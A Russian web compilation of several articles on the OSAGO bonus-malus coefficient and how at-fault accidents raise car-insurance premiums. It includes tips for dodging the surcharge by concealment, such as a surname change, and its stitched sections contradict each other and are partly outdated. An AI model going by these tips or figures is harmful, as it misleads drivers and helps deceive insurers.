Осаго коэффициент за дтп

Как влияет ДТП на стоимость ОСАГО?

Многие водители знают, что попадание в аварии приводит к увеличению стоимости страховки. И совершенно естественно возникает вопрос: как влияет ДТП на стоимость полиса ОСАГО?

Система страхования автогражданской ответственности учитывает интересы двух сторон – автовладельцев и страховых компаний. Вторые для снижения финансовых рисков, связанных с выплатой возмещений, определяют стоимость полисов ОСАГО индивидуально, оценивая надёжность клиента с точки зрения его «склонности» к авариям. Результатом этой оценки является применении специальных коэффициентов к базовому тарифу, повышающих или, напротив, понижающих стоимость страхового полиса.

Что такое КБМ?

Одним из коэффициентов, оказывающих влияние на стоимость полиса ОСАГО, является КБМ – коэффициент бонус-малус. Его размер определяется профессионализмом автовладельца, которая выражается степенью безаварийности езды.

Если за год, предшествующий оформлению страхового полиса, автовладелец не совершил ни одной аварии, то он может рассчитывать на ощутимую скидку. Если же водитель стал участником ДТП, что повлекло возмещение ущерба страховой компанией, при расчёте стоимости полиса на следующий период страховщик применит повышающий КБМ, что повлечёт за собой повышение стоимости оформления полиса ОСАГО.

  • обеспечивает снижение финансовых рисков страховых компаний, в том числе уменьшает число обращений за компенсацией незначительного ущерба;
  • стимулирует водителей к безаварийной езде.

Конечно, никакой КБМ не гарантирует, что автовладелец не попадёт в ДТП по вине другого водителя или пешехода. Однако наличие или отсутствие вины в аварии является существенным фактором, которые учитывают страховые компании при определении КБМ конкретному клиенту.

КБМ не используется и, соответственно, и не оказывает влияния на стоимость полиса при оформлении ОСАГО на:

  • прицепы;
  • транзитные автомобили;
  • транспортные средства, зарегистрированные в других государствах и поставленные на временный учёт в РФ;
  • срок менее года.

Как изменится КБМ после аварии при вине водителя?

Насколько изменится стоимость полиса ОСАГО при безаварийной езде или, напротив, после ДТП по его вине, автовладелец может определить самостоятельно. Страховые компании используют значения КБМ, которые рассчитываются по специальной таблице. Стартовым является коэффициент бонус-малус, равный единице.

Сколько будет действовать повышающий коэффициент ОСАГО после ДТП в 2020 году

На всей территории РФ действует единый закон для автолюбителей. Суть закона заключается в том, чтобы водитель, прежде чем сесть за руль, застраховал свою ответственность. Страховая программа получила название – ОСАГО. В рамках программы обязательного страхования предусмотрены не только скидки, но и повышающие показатели. В результате этого возникает вполне закономерная проблема: сколько действует повышающий коэффициент ОСАГО после ДТП. Рассмотрим в статье, что такое КБМ и как он меняется от наличия или отсутствия страховых выплат.

Что такое КБМ

Кбм — это коэффициент бонус-малус, который применяется при расчете страховой премии. Согласно тарифному руководству по страхованию ОСАГО предусмотрено 14 классов аварийности. При этом автолюбителю с 13 классом полагается максимальная скидка при расчете страховой премии.

Принцип работы бонус-малус очень простой:

  • за каждый год без аварийного управления дается скидка 5%, которая ежегодно суммируются;
  • при наличии убытков по вине водителя предусмотрен по ОСАГО повышающий коэффициент, который напрямую зависит от количества заявленных убытков.

Это единственный показатель, который участник движения может сам изменить. Аккуратные автолюбители, благодаря безаварийному вождению, могут сэкономить на приобретении полиса.

Также следует принимать во внимание, что с 2003 года со стороны государства вносились правки в тарифы и менялись все показатели, кроме таблицы с бонусами. Это единственный коэффициент, который остался неизменным с момента появления обязательного продукта на территории РФ.

Как зависит стоимость полиса от КБМ

Важно учитывать, что стоимость обязательного полиса ОСАГО напрямую зависит от КМБ. Чем ниже его значение, тем меньше стоимость защиты.

Рассмотрим простой пример, как меняется стоимость ОСАГО для автолюбителей, при изменении КБМ.

БТ

Итого, рублей

Благодаря таблице вы можете сами посмотреть, как зависит стоимость бланка ОСАГО от размера КБМ.

Расчет стоимости полиса ОСАГО производится в соответствии с методическими рекомендациями утвержденными РСА по следующей формуле:

СП = Тб × Кт × Кбм × Квс × Ко × Км × Кс × Кп × Кн, где:

Таблица КБМ и как его рассчитать

Как только был принят единый 40 ФЗ закон по обязательному страхованию, все представители страховых компаний пользовались единой таблицы КБМ. На первый взгляд таблица кажется сложной и непонятной. Однако все очень просто и легко можно определить.

  1. Страховой класс на начало оформления договора страхования. Для получения информации достаточно взять страховой полис и посмотреть сведения в разделе «особые отметки». Однако стоит учитывать, что в последнее время многие страховые компании не делают отметку в классе страхование. В каком случае получить сведения по бонусу можно только через единую базу РСА которая работает круглосуточно и бесплатно.
  2. Коэффициент, который используется при расчете ОСАГО. Максимальный равен 2,45, в то время как минимальный 0,5.
  3. Класс на новый срок, который зависит от количества или отсутствия страховых выплат. Указанный раздел разделен на 5 столбцов: 0,1,2,3,4 и более страховых случаев.

Для формирования расчета вам потребуется:

  • уточнить класс на момент оформления ранее заключенного бланка;
  • оставаясь на данной строке посмотреть новый класс, в зависимости от страховых случаев.

К примеру, по полису был 5 класс. Если у водителя:

  • нет аварий, то по новому ОСАГО страховщик применит 6 класс, а именно скидку 15%;
  • была 1 авария, то новый класс — 3 (начальный);
  • было 2 аварии — 1 класс, а именно повышающий 1,55;
  • было 3 аварии и более — максимальный класс, которому соответствует показатель 2,45.

Сколько действует повышающий коэффициент ОСАГО после ДТП

Как правило, все водители, которые попали в аварию, не знают, на какой срок будет зафиксирован повышающий показатель. Такая проблема возникает, поскольку никто не хочет переплачивать.

Если ранее страхователи могли обмануть страховщика и при оформлении бланка сказать, что аварий не было, то теперь все иначе. Несколько лет назад была создана специальная база РСА, в которою предоставляют сведения все страховщики о классе аварийности.

На сколько фиксируется повышающий, зависит от того, будет спустя год аварии у водителя или нет. К примеру, если у участника движения максимальный повышающий и в течение страхового года случилась авария, то класс сохраняется.

Пример действия повышающего коэффициента:

Повышающий

Новый КБМ

При этом важно принимать к сведению, что показатель может фиксироваться:

  • по водителю, при условии, что по договору предусмотрено ограниченное количество лиц, которые управляют машиной;
  • за собственником, на чье имя оформлено ТС.

Поскольку полис страхования всегда приобретается на 1 год, то и повышающий коэффициент будет действовать в течение года. Узнать показатель на новый срок можно не ранее чем за 60 дней, до окончания прежде купленного договора.

Как меняется после ДТП при безаварийной езде

Важно знать: как меняется стоимость защиты, если после ДТП водитель аккуратно управляет автомобилем и не является виновником. На самом деле в таком случае все просто. Сначала страховщик повысит страховку, а после начнет снижать стоимость договора.

Если внимательно изучить таблицу, то станет ясно, что при наличии максимального коэффициента, водителю необходимо 4 года аккуратно управлять машиной, чтобы вернуться на начальный класс страхования. Именно спустя указанное время можно продолжать безаварийно ездить и зарабатывать 5% скидку за каждый год.

Можно ли избежать повышения цены на ОСАГО после ДТП

Безусловно, никто не желает платить больше, даже если он виноват. В таком случае возникает вопрос: можно ли как избежать ответственности и купить бланк договора по меньшей цене? Если вернуться в 2003 год, то можно сказать – можно. Именно при введении нового продукта у владельцев ТС было несколько лазеек:

Смена страховой организации

Достаточно было поменять страховщика и сообщить, что по ранее оформленному договору страховых случаев не было.

Смена водительских прав

При страховании участник движения мог сказать, что только получил права и ранее никогда не пользовался услугами обязательного страхования.

Не предъявлять полис

Достаточно просто сказать, что страхуетесь первый год и не показывать ранее оформленный ОСАГО.

Поскольку единой базы РСА небыло, страховщики не могли быстро проверить информацию по данным транспортного средства. Поэтому все было на доверии. Времена меняются, и сегодня вся процедура страхования проходит через единую базу РСА.

  • проверяются данные по правам, в том числе и ранее полученным, которые всегда прописываются на документе;
  • страховщик смотрит по идентификационному номеру ТС, где ранее был застрахован авто и на какой срок;
  • сотрудники страховой компании проверяют сведения по каждому участнику движения и собственнику.

Получается – избежать ответственности не получится. Однако есть одна лазейка, благодаря которой водители могут снизить стоимость договора. Для этого необходимо:

  • оформить бланк договора с условием «неограниченное количество лиц допущенных к управлению»;
  • спустя год купить договор, с ограниченным количеством водителем.

Согласно закону, если в течение года автолюбитель не был застрахован, то класс из единой базы РСА исчезает. При этом совершенно неважно, повышающий он, или понижающий. Такая хитрость подходит тем участникам движения, у которых максимальный повышающий коэффициент, по таблице КБМ.

Что касается водителей женского пола, то они могут избежать ответственности при смене фамилии. Не секрет, что на правах не прописывается прежняя фамилия. В результате этого страховая организация, запрашивая сведения, получит информацию, что клиент ранее не страховался и применит 3 (начальный) класс аварийности.

Зачастую страховые агенты предлагают оформить бланк договора по начальному классу, или со скидкой (в страховых компаниях есть возможность поменять КБМ вручную) при условии приобретения дополнительной услуги. Вы должны понимать, что в результате наступления страхового события факт мошенничества может быть раскрыт. В таком случае в выплате вам, конечно, не откажут, но и применят дополнительный повышающий показатель при оформлении нового договора (за грубые нарушения).

Смена страховой

Многие автолюбители уверены, что после ДТП могут обратиться в офис другой страховой компании и купить ОСАГО без повышения ставки за ДТП. Как уже было сказано, теперь все страховые компании тщательно проверяют информацию по каждому клиенту.

Что касается процедуры оформления через интернет, то она аналогичная. Получается, даже если вы решите воспользоваться услугами другой организации, то стоимость будет сформирована с учетом повышающего показателя.

Смена страховой актуальна в том случае, если компания готова предложить приобрести договор по минимальной базовой ставке. В этом случае у водителя появляется возможность сэкономить до 1000 рублей.

Получить информацию можно о размере базовой ставки:

  • по телефону горячей линии страховщика;
  • на портале РСА, путем обращения через обратную связь;
  • в офисе брокера, который сразу предлагает ОСАГО от нескольких компаний;
  • на нашем портале, путем формирования запроса через специальный калькулятор.

Что касается последнего варианта, то предлагаем сэкономить личное время и сформировать запрос за считанные минуты. Вся информация предоставляется совершенно бесплатно. По итогам расчета вы узнаете стоимость ОСАГО во всех крупных компаниях и сможете оформить покупку в режиме реального времени, на официальном сайте страховщика или лично в офисе.

Согласно закону каждая страховая компания, при страховании ОСАГО, может выбрать размер базовой ставки, которую будет использовать при расчете страховой премии. В рамках закона, для легковых транспортных средств, ставка находится в диапазоне от 3 432 до 4118 рублей.

В завершение можно отметить, что примененный при автострахование повышающий по ОСАГО при ДТП будет действовать год, при условии, что водитель будет аккуратным водителем. В противном случае коэффициент увеличится или останется неизменным, при условии, что по договору максимальный показатель. При этом размер КБМ будет единым во всех компаниях, поскольку вся информация проверяется на едином портале РСА.

Предлагаем вам, читатель, поделиться своим опытом и рассказать, как долго у вас был повышающий коэффициент после ДТП, по обязательному страхованию, в результате чего получили и как смогли сэкономить на покупке нового договора.

При необходимости вы также всегда можете получить помощь опытного эксперта на нашем портале, который работает 24 часа в сутки и подскажет ответ на любой вопрос.

Ну и, конечно, не забывайте ставить лайк и делиться материалом со своими родными и близкими.

Более подробно про КБМ в страховке вы узнаете далее.

Как меняется КБМ по ОСАГО после ДТП? Расчёт. Можно ли и как восстановить?

  1. КБМ не всегда повышается, если вы попали в аварию. Его значение зависит вовсе не от ДТП, а конкретно от страхового случая – то есть если вы признаны виновным, а потерпевший обратился и получил выплату по ОСАГО.
  2. Расчёт коэффициента производится по утверждённой Центробанком таблице.
  3. Если даже у вас максимальная безаварийная скидка, то, попав за год в аварии 3 раза, вы уже достигнете самого высокого значения коэффициента.
  4. Изменившийся КБМ можно и восстановить к прежнему значению, но не во всех случаях.

При попадании в ДТП изменяется стоимость полиса ОСАГО на следующий период страхования. Но далеко не во всех случаях. В статье мы выясним, для кого, и, главное, насколько уменьшается КБМ и, соответственно, повышается коэффициент, на который умножается при расчёте базовый тариф в 2019 году. Мы также приведём примеры расчётов.

Попали в ДТП – всегда ли изменяется КБМ?

Нет. Но сначала давайте выясним, что же это такое – КБМ!

Это коэффициент бонус-малус, который применяется при расчёте полиса ОСАГО при покупке его на автомобиль. То есть при определении стоимости страховки сначала берётся базовый тариф, который страховая компания устанавливает самостоятельно, но в пределах установленного законом коридора от 2 746 до
4 942 рублей для легковых автомобилей физических лиц в России.

Далее при расчёте эта фиксированная сумма умножается поочерёдно на определённые коэффициенты. По состоянию на 2019 год из всего 7:

  1. коэффициент региона регистрации в России,
  2. КБМ – в зависимости от наличия страхового случая,
  3. ограниченного или неограниченного по водителям ОСАГО,
  4. возраста и стажа,
  5. мощности машины,
  6. сезонности эксплуатации авто,
  7. срока страхования.

Все они применяются поочерёдно в таком же порядке, как представлено в списке выше. То есть берём, к примеру, базовый тариф 4 000 рублей, и, если владелец машины проживает в Москве, то получаем коэффициент 2 – то есть стоимость в расчёте увеличивается в 2 раза – до 8 тысяч. Далее, например, человек ни разу не попадал в ДТП в течение последних 8 лет, то далее применяется КБМ 0,6 – то есть 8 000 умножаем на 0,6 и получаем 4 800 рублей. И так до последнего коэффициента.

Но в любом случае итоговая цена страховки ОСАГО не должна превышать в 3 раза базовый тариф.

Таким образом, КБМ – это зависимость стоимости полиса от количества страховых случаев. Его текущее значение хранится в базе данных РСА (Российского союза автостраховщиков), и запрашивается сотрудниками страховых каждый раз, когда они рассчитывают стоимость вашего полиса.

Многие автолюбители в обиходе называют этот коэффициент «безаварийной скидкой», что в целом не совсем верно, потому что:

    КБМ не зависит напрямую от ДТП,

здесь может быть не только скидка, но и повышение стоимости, если вы часто попадаете в аварии и оказываетесь в них виновником.

Итак, КБМ после дорожного происшествия изменяется не всегда, а только при следующих условиях:

  • вы признаны виновником в аварии,
  • по результату ДТП потерпевшая сторона обратилась за страховым возмещением – то есть КБМ не меняется от простого наличия аварии, должен быть именно страховой случай – то есть выплата или направление на ремонт; проще говоря, страховая организация должна потерпеть убыток.

Если я не виноват(а)?

Тогда КБМ для вас не вырастет и никак не изменится. Дело в том, что этот коэффициент призван мотивировать автовладельцев соблюдать ПДД, меньше попадая в аварии. То есть если вы часто оказываетесь виновником в ДТП, то страховка для вас дорожает.

Если же вы ни в чём не виновны, то и ОСАГО для вас не должно поменять. Логично? Вполне!

Если вина обоюдная?

В этом случа вне зависимости от степени виновности в ДТП бонус-малус повысится для всех его участников. Увы, но даже возрастания КБМ на меньшие значения в зависимости от степени обоюдной вины каждого участника не предусматривается. Даже если вы виновны всего на 1%, КБМ изменится одинаково, как и для виновника на 99%.

Как меняется КБМ? Таблица

Итак, теперь мы знаем, что безаварийная скидка вырастет только в том случае, если вы виновник ДТП, а потерпевший обращался в страховую и получил возмещение по ОСАГО.

Страховщики же (если быть точнее, то Центробанк) уже давно всё рассчитали и придумали фиксированную таблицу изменения КБМ в зависимости от страховых случаев. Она менялась в последний раз в апреле 2019 года и на сегодняшний день выглядит нижеследующим образом.

  • цветом выделен непосредственно сам КБМ – то есть его значение при покупке полиса ОСАГО,
  • красным выделены значения коэффициента, когда они увеличивают стоимость страховки,
  • синим – изначальный КБМ, если вы ранее не страховались, или у вас был перерыв более года (когда он обнуляется),
  • а зелёным – значения коэффициента, когда они снижают стоимость страховки,
  • все столбцы правее первого – это количество ДТП в страховом периоде и как они увеличивают значение на следующий год.

Повышающий коэффициент ОСАГО после дорожной аварии

Полис ОСАГО – одно из обязательных условий, без которого не будет выдано разрешение на вождение. Стоимость его оформления зависит от тарифов, которые регулирует Центральный Банк России. Страховщики не могут влиять на итоговую цену оплаты полиса. Но она меняется в зависимости от целого ряда коэффициентов. Они способны сделать сумму, которую должен оплатить человек, оформляющий страховку, выше или ниже. В зависимости от этого условия рассчитывается окончательная стоимость полиса ОСАГО. При необходимости её можно рассчитать самостоятельно, внимательно разобравшись в коэффициентах.

Страховые коэффициенты при ДТП

Законодательными органами страны предусмотрен комплекс коэффициентов при ДТП. Они условно делятся на две группы:

К первой группе относятся коэффициенты, созданные для повышения ответственности среди неосторожных водителей, пренебрегающих правилами. Их задача – побудить человека к правильному вождению путем снятия с него дополнительных денежных средств.

Вторая группа включает коэффициенты, предназначенные водителям, которые, наоборот, соблюдают правила дорожного движения. За осторожную езду человек получает дополнительные бонусы.

Обе группы преследуют одну цель – снизить количество ДТП. Предусмотрено три основных повышающих коэффициента ОСАГО, используемых при возникновении аварий:

  • Кт – зависит от среднего показателя ДТП в населенном пункте, на территории которого проживает владелец транспортного средства (в большинстве случаев для жителей небольших городов он ниже, а значит и платить за страховой полис ОСАГО придется меньше);
  • Кн – определяется на основе соблюдения правил, предусмотренных страховым договором – если водитель их нарушил (в результате чего произошла авария, или было оставлено место происшествия), стоимость полиса увеличивается;
  • Квс – зависит от того, сколько лет автовладельцу, и какой он имеет опыт вождения (чем старше водитель, тем ниже для него будет цена за оформление страховки ОСАГО).
  • КБМ – зависит от количества ДТП совершенных водителем.
  • КН – коэффициент нарушений ПДД.
  • КМ – коэффициент мощности двигателя. Измеряется в лошадиных силах.

Также важное значение для оформления страхового полиса ОСАГО играет коэффициент Кбм. Он связан с показателем ДТП на трассах.

Как рассчитывается Кбм?

Кбм – коэффициент, известный под названием “бонус-малус”. Благодаря этому показателю страховыми компаниями начисляется премия водителям. Этот коэффициент бывает двух вариантов:

Кбм определяется на основе класса владельца авто. Класс фиксируется рядом значений, где “М” – минимальный, а “13” – максимальный. Затем в зависимости от количества страховых инцидентов определяется класс по ОСАГО. В зависимости от этого водитель может получить либо скидку, либо более высокие тарифы. Определить Кбм можно при помощи таблицы:

Для автовладельцев с показателем Кбм ниже единицы начисляются бонусы. Максимальный бонус присваивается водителям с коэффициентом 0,5. Если же Кбм выше единицы, то водителю придется оплачивать страховку по завышенным тарифам.

Как может изменяться коэффициент ОСАГО?

Коэффициент ОСАГО в зависимости от качества вождения владельца транспортного средства после ДТП может:

Если водитель не попадает в аварии, через определенный период коэффициент ОСАГО начет повышаться. Если же человеку приходится часто сталкиваться в ДТП, этот показатель, наоборот, будет уменьшаться. Эта схема достаточно проста, но бывают случаи, при которых коэффициент остается стабильным.

Повышающий коэффициент ОСАГО не изменяется после оформления ДТП если:

  • страховка была оформлена на прицеп, а не на авто;
  • машина попала в аварию, но полис был оформлен на период не более одного года;
  • страховкой был обеспечен транспорт транзитного типа.

Также система не распространяется на иностранцев. При других условиях коэффициент ОСАГО после ДТП меняется стандартным образом.

Повышающий коэффициент ОСАГО после ДТП

Независимо от квалификации при получении страхового полиса водителю выдается класс третьего уровня. Ежегодно при продлении страховки он постепенно повышается на одно значение. Так, чтобы получить класс тринадцатого уровня автовладелец должен продлевать полис ОСАГО в течение десяти лет.

Но подобное развитие возможно лишь в том случае, если за указанный период человек ни разу не попал в ДТП. Осторожные водители получают от страховщика скидку в размере 5% за каждый год без инцидентов. Соответственно после десятилетнего периода водители, не попадавшие в аварию, получают скидку на страховку в размере 50%.

Но она будет сразу же уменьшена, если водитель хотя бы раз попадет в ДТП. Также автоматически понижается рейтинг автовладельца. В зависимости от количества страховых случаев уровень снижается от двух до семи значений. Чем чаще человек попадает в аварию, тем ниже показатель доверия к нему у страховщика.

Когда класс ОСАГО после ДТП падает ниже третьего уровня, водителю начинают начисляться штрафные проценты в виде завышенных тарифов. Ниже класса “М” уровень не понижается. Чтобы восстановить нормальный показатель, потребуется не менее четырех лет езды без происшествий.

Как повышается коэффициент?

Повышение коэффициента ОСАГО после ДТП зависит от точного количества дорожно-транспортных происшествий, с которыми столкнулся автовладелец на период действия страхового полиса. Рассмотрением каждой ситуации в индивидуальном порядке занимается специальная комиссия страховой компании, руководствующаяся Гражданским кодексом России. Страховщик обязан действовать на основе федеральных законов 4015-1 и 40. Если законы будут нарушены, автовладелец имеется право обратиться в суд и потребовать возмещение ущерба. При этом он должен предоставить доказательства, подтверждающие его слова.

Повышение коэффициента ОСАГО после ДТП зависит от того, насколько человек пользуется услугами конкретной страховой компании. Для неопытных водителей стандартного класса, недавно оформивших страховку, предусмотрена жесткая система контроля:

  • после одной аварии водитель получает первый класс (повышающий коэффициент ОСАГО ниже стандартного);
  • Кбм автовладельца становится равным значению “1,55”;
  • оформление страхового полиса обходится дороже почти вполовину.

Если произошло два и более ДТП, класс водителя отмечается значением “М”. Коэффициент ОСАГО при таком классе становится “2,45”. При следующей оплате цена за страховку будет на 145% выше стандартной.

Схема для водителей, длительное время пользующихся услугами страховщика, менее жесткая. Если после ДТП возникнет страховой случай, повышение Кбм ОСАГО отразится только на скидке, начисленной за год безупречного вождения. Водителю с десятилетним стажем езды без ДТП придется попасть в аварию три раза подряд, чтобы достичь стандартного уровня.

Следует учитывать, что при изменении коэффициента берется во внимание количество аварий за весь период использования страхового полиса, а не один за год.

Таблица повышающий коэффициента ОСАГО после ДТП

В 2013 году было принято постановление о создании единой базы союза автостраховщиков. Независимо от того, в каком страховой компании был получен полис, данные вносятся в открытый доступ. Благодаря этому водитель не может повлиять на свой класс и повышающий коэффициент ОСАГО после ДТП, изменив страховую компанию.

Вычисление повышающего коэффициента ОСАГО после ДТП проводится при помощи специальной таблицы:

Также узнать свой класс и Кбм можно при помощи онлайн-калькулятора, или сделав запрос в Единый реестр автостраховщиков. От человека потребуется указать свои данные, после чего ему будет показан результат.

Сколько действует повышающий коэффициент?

Действие повышающегося коэффициента ОСАГО после ДТП зависит от принципа заключения страхового полиса. В большинстве случаев он оформляется на один год. Длительность повышающего коэффициента ОСАГО всегда равна периоду действия полиса. Соответственно, Кбм в этом случае также будет действовать год. По истечению этого срока показатель меняется либо в положительную сторону, либо в отрицательную.

Однако это условие не всегда соблюдается. В данном случае важную роль играет страховая компания, предоставляющая услуги водителю. Довольно часто встречаются страховщики, пользующиеся неопытностью автовладельцев. Чтобы человек и дальше платил по более высоким тарифам, длительность Кбм намеренно не указывается. Кроме того, иногда этот показатель может быть завышен случайно.

Для того, чтобы избежать подобных ситуаций, специалисты рекомендуют водителям вести собственный учет. Автовладельцу нужно точно знать, когда и на какой срок был оформлен полис, и от какой даты начал действовать новый повышающий коэффициент.

Повышающий Кбм ОСАГО если не виноват

Вопрос повышающегося Кбм ОСАГО после ДТП если не виноват возникает в двух случаях:

  • авария произошла не по вине автовладельца;
  • в момент ДТП за рулем находился не он.

Если водитель не является виновником дорожно-транспортного происшествия, показатель Кбм не изменяется. Однако для этого ему нужно доказать, что авария действительно случилась по вине другого человека.

Большинство страховых компаний не выплачивают возмещение ущерба без наличия неопровержимых доказательств отсутствия вины со стороны владельца авто. Для этого потребуется заключение правоохранительных органов, или, как минимум, запись с видеорегистратора. Поэтому эксперты советуют устанавливать записывающие приборы даже на старые автомобили, комплектация которых их не предусматривает.

В некоторых случаях на страховку записываются сразу несколько водителей. При ДТП, Кбм повысится только у того водителя, который в этот момент находился за рулем транспортного средства, при условии, что его вина будет доказана. Страховщик не имеет права повышать коэффициент ОСАГО водителю, вину которого не подтвердили сотрудники ГИБДД. Если автовладелец попал в ДТП не по своей вине, в его историю езды этот инцидент вписан не будет, и она останется безаварийной.

Как обойти повышающий коэффициент ОСАГО после ДТП?

После принятия правок в законе “Об ОСАГО” самый надежный способ обойти повышающий коэффициент – не попадать в ДТП. Неопытным водителям следует учесть ряд вариантов, реализовать которые не получится:

  • смена страховой компании;
  • оформление страховки на другого человека;
  • скрытие информации об аварии при изменении страховой компании.

Наиболее распространенным был второй способ. Эта хитрость использовалась, если страховка транспортного средства была оформлена на нескольких водителей. Как уже отмечалось ранее, Кбм повышается после ДТП только у человека, находившегося за рулем авто в момент аварии. В этом случае при следующем продлении полиса он не вписывается в договор, и коэффициент ОСАГО не меняется. Проще всего этот способ реализовать семейным парам.

Попытки избежать изменения Кбм отслеживают. Несмотря на это многие автовладельцы утверждают, что им удалось очистить историю езды, не продлевая страховку в течение года. Но подобные случаи скорее случайность, чем закономерность. В течение 15 дней после ДТП, страховщик вносит данные об автовладельце в общую базу. Там же указывается и номер удостоверения.

Еще один способ избежать изменение повышающегося коэффициента ОСАГО – договориться с участником ДТП о личном возмещении ущерба без вызова государственных органов и страховщиков. Этот способ достаточно рискованный, поскольку на него согласится далеко не каждый водитель, в случае вашей вины. Если же авария случилась из-за другого человека, подобный условный договор не дает гарантий того, что он действительно возместит ущерб. Прибегать к этому способу следует в том случае, если сумма ущерба меньше процентного повышения стоимости продления страховки после увеличения Кбм.

Необходимо учитывать, что попытки избежать повышения коэффициента в случае собственной вины, могут привести административно-уголовной ответственности.

Неопытным автовладельцам следует знать, что, изменяя страховую компанию, их Кбм остается на том же уровне, что и был. Многие неблагонадежные страховщики используют незнание человека в свою пользу, присваивая ему третий класс после оформления полиса. Основной аргумент, который они предоставляют – отсутствие данных о водителе в общей базе страховщиков. Имеется несколько решений подобной ситуации:

  • обращение к страховщику, который обслуживал водителя ранее;
  • получение справки в Союзе Страховщиков;
  • личная проверка базы автострахования.

Страховщик не имеет права самостоятельно изменять базовые тарифы. Если водитель столкнется с такой ситуацией, ему необходимо обратиться с жалобой в правоохранительные органы. Но коэффициент ОСАГО может быть изменен, если:

  • водитель соврал об обстоятельствах дорожно-транспортного происшествия;
  • если авария произошла по его умышленной вине;
  • автовладелец находился в момент аварии под действием алкогольных веществ;
  • он сбежал с места инцидента;
  • водитель ранее ездил без страховки.

Если авария случилась не по вине водителя, но Кбм для него остается на прежнем уровне. Однако он должен получить скидку в размере 5% при продлении страхового полиса на следующий год.

10 вопросов про надбавки за аварийность в ОСАГО

С 1 апреля 2019 года правила присвоения коэффициента «бонус-малус» (КБМ) в ОСАГО изменились, причем к лучшему для водителя, но разобраться в них по-прежнему непросто. Отвечаем на самые сложные вопросы про систему скидок и надбавок за аварийность/безаварийность.

1. Как узнать свой КБМ и оспорить его значение, если не согласен?

Вы можете проверить свой коэффициент за безаварийную/аварийную езду на сайте Российского союза автостраховщиков (РСА), на сайте страховщика или финансового супермаркета, который предлагает услуги разных компаний и дает возможность сравнить цены (они зависят от выбранного компанией базового тарифа для данного региона). Необходимо ввести фамилию, имя, отчество, дату рождения и номер водительских прав. На сайтах страховщиков или агрегатора вы можете сразу рассчитать стоимость полиса. Если цена подошла, на этой же странице вы можете оплатить полис и получить его по электронной почте в течение нескольких минут. Если вы не согласны (при переходе на единый КБМ могут быть сбои) с данными, можно обратиться в РСА, если там не удалось разрулить ситуацию, есть еще Банк России.

2. Могут ли отличаться значения КБМ у разных компаний?

При расчете стоимости сайт РСА и сайты страховщиков обращаются за вашими данными к одному источнику — автоматизированной информационной системе обязательного страхования автогражданской ответственности (АИС ОСАГО), созданной в соответствии со статьей 30 федерального закона «Об ОСАГО». Соответственно, значения коэффициента у всех компаний одинаковы.

3. Раньше КБМ устанавливался на момент заключения договора ОСАГО и мог меняться в течение года после каждого ДТП. Как теперь?

С 2019 года коэффициент «бонус-малус» присваивается каждому водителю раз в год 1 апреля, в течение года он пересматриваться не будет, даже если вы покупаете новый полис на другой автомобиль. Допустим, после 1 апреля 2019 года, когда вам присвоили КБМ, вы стали виновником аварии, после чего решили продать машину. Затем через пару месяцев купили новое авто и хотите заключить новый договор ОСАГО.

Если вы придете в страховую компанию до 31 марта 2020 года, то случившееся ДТП «в зачет» не пойдет — при расчете стоимости полиса будет применен тот же коэффициент, что и 1 апреля 2019 года. А в момент присвоения нового КБМ (1 апреля 2020 года) будут учитываться все данные о выплатах по ОСАГО, зарегистрированные в АИС ОСАГО за год, даже если ваш страховщик внезапно ушел с рынка. Таким образом, если вы являлись виновником ДТП, лучше перезаключить договор чуть раньше окончания расчетного периода. Но не забывайте, что полис ОСАГО начинает действовать лишь через три дня после заключения договора, так что лучше позаботиться об этом заранее.

4. Я вожу мотоцикл и легковой автомобиль, будет ли у меня единый КБМ при оформлении ОСАГО на любой из этих видов транспорта?

Да, с 1 апреля 2019 года коэффициент «бонус-малус» один для всех видов транспорта, которыми вы управляете, включая грузовые автомобили и маршрутные такси.

5. Какую максимальную скидку я смогу получить за безаварийную езду? Какова максимальная надбавка за высокую аварийность?

За каждый год безаварийной езды, как и раньше, скидка увеличивается на 5%, максимально возможная экономия — 50% (коэффициент 0,5). Ее можно получить на десятый год безаварийной езды. Максимальный повышающий коэффициент — 2,45, его можно «заработать», если трижды (и больше) за год стать виновником ДТП.

6. Сохранится ли мое значение КБМ, если я поменял страховую или долго не страховался?

Раньше все скидки за безаварийную езду «сгорали» при перерыве в страховании более года — приходилось начинать копить скидки с нуля, точнее с единицы. Теперь КБМ не будет обнуляться, даже если вы не страхуетесь или если вписаны в мультиполис. При смене страховщика КБМ тоже не меняется. Раньше имела место практика, когда новый страховщик «не мог» найти ваш КБМ (то есть скидку) в базе. Если вы столкнулись с подобной хитростью, помогите агенту (и себе самому) — найдите свой КБМ на сайте РСА и покажите страховщику, чтобы он не мог отвертеться.

7. Какой у меня будет КБМ при покупке первого полиса страхования автогражданской ответственности?

Для людей, страхующих свою ответственность впервые, КБМ считается равным единице. Такой же КБМ присваивается лицам, данных о которых нет в АИС ОСАГО по какой-то иной причине. Например, если вы поменяли водительское удостоверение и не уведомили об этом своего страховщика — система просто вас не найдет.

8. Если я впишу в полис 18-летнего человека, у которого нет стажа, какой будет КБМ?

Для тех водителей, по которым нет данных в АИС ОСАГО (а до 18 лет их быть попросту не может), коэффициент аварийности равен единице. Надбавки за малые возраст и стаж учитываются другим коэффициентом. По КБМ вы получите единицу, так как выбирается максимальный коэффициент из всех, которые имеют вписанные в полис водители.

Три месяца ОСАГО живет по новым правилам: с расширенным тарифом и новым коэффициентом «возраст-стаж». А с 1 апреля по-новому начисляется «бонус-малус». Что стало с ценами и куда они двинутся дальше?

9. Могу ли я вписать в полис человека, который попадал в аварии (я — нет), без увеличения КБМ?

При расчете цены ОСАГО учитывается КБМ всех лиц, допущенных к управлению автомобилем, причем выбирается наибольший из имеющихся коэффициентов (см. выше). Если в течение нескольких лет вы не попадали в аварии и вам присвоен высокий класс по КБМ (всего их 15), вам невыгодно допускать к управлению «аварийных» водителей.

10. У меня полис без ограничения числа водителей, допущенных к управлению (мультиполис). Кому будет присваиваться повышенный КБМ, если автомобиль окажется участником аварии, но за рулем буду не я?

Раньше коэффициент рассчитывался исходя из данных владельца, а если данных за предыдущий период страхования в базе не было, то КБМ был равен единице. Причем раньше виновность в аварии влияла на КБМ владельца автомобиля, на которого оформлен полис с неограниченным числом допущенных к управлению лиц. Теперь все ДТП «пишутся» только на виновника, то есть в следующем периоде учитываются при расчете его КБМ. Это распространяется и на мультиполисы.

Ссылка на основную публикацию
Adblock
detector
